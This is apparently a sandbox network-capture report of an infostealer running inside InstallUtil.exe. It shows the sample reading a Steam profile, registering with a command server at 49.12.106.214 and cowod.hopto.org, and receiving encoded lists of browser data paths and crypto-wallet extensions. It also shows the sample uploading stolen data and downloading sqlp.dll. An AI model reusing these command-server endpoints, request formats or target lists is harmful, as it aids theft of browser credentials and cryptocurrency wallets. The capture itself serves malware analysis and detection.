                                                                                                                Host: cowod.hopto.org
                                                                                                                Content-Length: 5769
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Oct 8, 2024 05:00:16.886065960 CEST5769OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31
                                                                                                                Data Ascii: ------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------BFHJJJDAFBKEBG
                                                                                                                Oct 8, 2024 05:00:17.634572029 CEST188INHTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Tue, 08 Oct 2024 03:00:17 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 0
                                                                                                                Connection: keep-alive
                                                                                                                X-Served-By: cowod.hopto.org


                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449741104.102.49.2544437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:36 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                Host: steamcommunity.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:36 UTC1870INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                Cache-Control: no-cache
                                                                                                                Date: Tue, 08 Oct 2024 02:59:36 GMT
                                                                                                                Content-Length: 34889
                                                                                                                Connection: close
                                                                                                                Set-Cookie: sessionid=0e39fa0a4419d8f342677848; Path=/; Secure; SameSite=None
                                                                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                2024-10-08 02:59:36 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                2024-10-08 02:59:36 UTC16384INData Raw: 09 53 55 50 50 4f 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e
                                                                                                                Data Ascii: SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSn
                                                                                                                2024-10-08 02:59:36 UTC3768INData Raw: 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a
                                                                                                                Data Ascii: "profile_summary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div>
                                                                                                                2024-10-08 02:59:36 UTC223INData Raw: 61 63 6b 22 20 6f 6e 63 6c 69 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: ack" onclick="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.44974249.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:37 UTC186OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:38 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:38 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 02:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.44974349.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:38 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAE
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 256
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:38 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 33 43 37 41 37 41 37 42 45 44 31 32 35 33 31 33 31 38 31 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 2d 2d 0d
                                                                                                                Data Ascii: ------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="hwid"633C7A7A7BED1253131813-a33c7340-61ca------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------EBAKKFHJDBKKEBFHDAAE--
                                                                                                                2024-10-08 02:59:39 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:39 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 02:59:39 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 3a1|1|1|1|c2982176b812cb9215482e1d97c29975|1|1|1|0|0|50000|10


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.44974449.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:40 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGID
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 331
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------DBKKKEHDHCBFIEBFBGIDCont
                                                                                                                2024-10-08 02:59:40 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:40 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 02:59:40 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.44974549.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:41 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 331
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------GIEBAECAKKFCBFIEGCBKCont
                                                                                                                2024-10-08 02:59:42 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:42 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 02:59:42 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.44974649.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:42 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 332
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:42 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------BKFBAKFCBFHIJJJJDBFCCont
                                                                                                                2024-10-08 02:59:43 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:43 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 02:59:43 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.44974749.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:44 UTC279OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDH
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 6649
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:44 UTC6649OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------JKECGDBFCBKFIDHIDHDHCont
                                                                                                                2024-10-08 02:59:45 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:45 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 02:59:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.44974849.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:45 UTC194OUTGET /sqlp.dll HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:45 UTC262INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:45 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 2459136
                                                                                                                Connection: close
                                                                                                                Last-Modified: Tuesday, 08-Oct-2024 02:59:45 GMT
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                Accept-Ranges: bytes
